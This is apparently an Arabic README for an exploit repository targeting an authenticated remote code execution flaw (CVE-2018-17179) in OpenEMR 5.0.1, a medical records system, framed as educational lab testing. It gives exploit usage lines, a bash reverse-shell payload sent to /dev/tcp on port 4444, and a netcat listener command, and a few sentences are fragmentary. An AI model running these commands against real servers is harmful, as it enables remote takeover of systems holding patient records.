
استغلال تنفيذ تعليمات برمجية عن بُعد مصادق عليه لـ OpenEMR 5.0.1 (CVE-2018-17179) مع حمولات أوامر قابلة للتخصيص ودعم قشرة عكسية لاختبار الاختراق التعليمي.
⚠️ إخلاء المسؤولية
هذا المستودع مخصص حصريًا للأغراض التعليمية والبحثية فقط.
يمكن استخدام المعلومات والكود المقدم هنا في بيئات خاضعة للتحكم، مثل أجهزة المختبرات الخاصة.
الاستخدام غير المصرح به لهذا الكود ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يعد غير قانوني وغير أخلاقي.
المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار ناتجة.
تؤثر CVE-2018-17179 على OpenEMR، وهو برنامج مفتوح المصدر واسع الاستخدام لإدارة السجلات الطبية الإلكترونية وممارسات العيادات.
يسمح خلل في آلية المصادقة لنقطة النهاية rest_routes.php لمستخدم مصادَق بتنفيذ أوامر تعسفية على الخادم.
يمكن أن يؤدي هذا إلى تنفيذ كود عن بُعد (RCE) في سياق مستخدم خادم الويب.
interface/main/main_screen.php عبر rest_routes.phpيوفر هذا المستودع نسخة معدلة من الاستغلال المنشور على Exploit-DB:
في هذا الاستغلال المخصص:
استهدفنا لوحة تسجيل دخول OpenEMR محلية للاختبار:

Usage: python2 exploit.py <target_url> -u <username> -p <password> -c <command>
Example:
python2 exploit.py http://<target>/openemr -u admin -p secretpass -c 'id'
rest_routes.php.
تنفيذ الاستغلال
تم تشغيل سكربت الاستغلال المعدّل مع حمولة قشرة عكسية (bash):
```bash
python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'

استقبل مستمع Netcat على المنفذ 4444 قشرة عكسية بنجاح:
nc -nvlp 4444

اطّلع على الشرح التفصيلي والنظرية في مقالتي على Medium:
👉 اقرأ التدوينة على Medium